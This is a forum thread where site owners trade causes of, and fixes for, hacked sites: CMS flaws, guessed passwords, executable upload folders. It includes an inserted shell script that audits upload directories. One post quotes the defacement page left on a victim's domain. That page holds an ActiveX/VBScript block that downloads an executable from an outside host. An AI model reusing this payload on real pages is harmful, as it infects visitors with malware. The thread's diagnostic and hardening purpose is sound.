My Site Got Hacked...how is that possible?

Status
Not open for further replies.
If you ever use a CMS for your site, make sure that you get the latest version, and customize it in such a way that logins and such are not completely default.

For example I once had a site hacked years and years ago because someone I sub-hosted was using PHPNuke, there was a vulnerability that allowed the person in, and well... it was subpar shared hosting so you know how that goes. (normally secure provided people sharing were up on their game too)... you live and learn.

Half the time they either guess your password, use a known exploit, or for some reason you have an upload folder that allowed them to upload a .php file which they could then run from that folder (turning off execute permission on any upload folder usually fixes this, and even better, moving said folder outside of the web-accessible area).
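An added audit script (not code from this thread) for the upload-folder case described above: it walks an upload directory and flags anything that would run as PHP if script execution were still enabled there, checking both the file name and the file contents. The directory layout and sample files are constructed for the example.

```shell
#!/bin/sh
# Added example (not code from this thread): audit a web upload directory for files that
# would run as PHP if the server still executed scripts there. Two independent checks:
#   1. a script extension anywhere in the name (shell.php, but also shell.php.jpg, which
#      multi-extension handling in some Apache setups still hands to PHP);
#   2. a PHP open tag inside the file, whatever its name claims it is.
# Prints one "reason<TAB>path" line per finding. The directory layout is hypothetical.
# Pair it with the fixes named above: `php_admin_flag engine off` (mod_php) or a
# <FilesMatch "\.ph(p[0-9]?|tml|ar)$"> ... Require all denied ... </FilesMatch> block for
# the upload directory, and ideally a storage path outside the document root.

scan_uploads() {
    find "$1" -type f | while IFS= read -r f; do
        case "$f" in
            *.php|*.php.*|*.php[0-9]|*.php[0-9].*|*.phtml|*.phtml.*|*.phar|*.phar.*)
                printf 'script-extension\t%s\n' "$f" ;;
        esac
        # Content check catches "image" uploads that are really scripts.
        if grep -q '<?php' "$f" 2>/dev/null || grep -q '<?=' "$f" 2>/dev/null; then
            printf 'php-open-tag\t%s\n' "$f"
        fi
    done
}

# Number of findings; suitable as a pass/fail check from cron or a deploy hook.
count_upload_findings() {
    scan_uploads "$1" | wc -l | tr -d ' '
}

# Demo on a constructed directory (sample data made up for this example).
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/2008"
    printf 'JFIF fake image bytes' > "$d/2008/photo.jpg"          # benign
    printf '<?php echo "not an image"; ?>' > "$d/2008/avatar.jpg"  # script disguised as image
    : > "$d/shell.php.jpg"                                          # double extension
    scan_uploads "$d"
    echo "findings: $(count_upload_findings "$d")"
    rm -rf "$d"
}

demo
```

A non-zero finding count is the signal to look at the server configuration for that directory, not just to delete the files.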
 


The majority of the time, hacked sites are exploited through a CMS with either a default admin password or through a vulnerable script that's part of the CMS. Consider installing the mod_security module for Apache, as that can help prevent vulnerable scripts from getting exploited (that will block queries that include unix command executions). It's not foolproof, but it sure helps.
 
Thanks for all your replies. I got so pissed last night so I terminated my account and the domain and created a brand new account on my VPS. I just wanted to get rid of that crap.

The funny thing though is that the only thing I had was a single page sales letter on that domain, no CMS, no blogs or anything like that.

Anyways, a good lesson for me since I used the same password for pretty much all my domains on the VPS.
 
2 of my blogs just got pwned by some guy/crew who calls himself/themselves "Scorpion". WordPress 2.6 - No idea how they got in. Checked logs, there's really nothing unusual. It's possible they just guessed my admin password. Make backups people!

Wow, same shit happened to me last Thursday/Friday. Somehow they logged into my WHM and cleared all my accounts and made one with h4ckd-something.....

I was running 2 smalltime autoblogs on hostingzoom... and the shitty thing is, I'm still waiting for them to put the backup on, couldn't reach anyone the last few days.
 
I saved the source code of the page the hacker put up on my domain before I terminated the account. Does it give any clues?

</body>
<meta http-equiv="Content-Language" content="en-us">

<body bgcolor="#000000">

<html>

<body>


<OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB">
</OBJECT>

<script language="vbscript">
rboldwn.url = "HacKer"4"eVeR http://h1.ripway.com/al11dmar/mjrm.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = EE4E00
rboldwn.start = "start"
</script>

</body>
</html>
 
That top part is encrypted so it's hard to tell what it does. Near the bottom is a URL for mjrm.exe which could be a virus.
 
Did you have anything else on the site that could have been compromised? It could be your whole hosting account.
 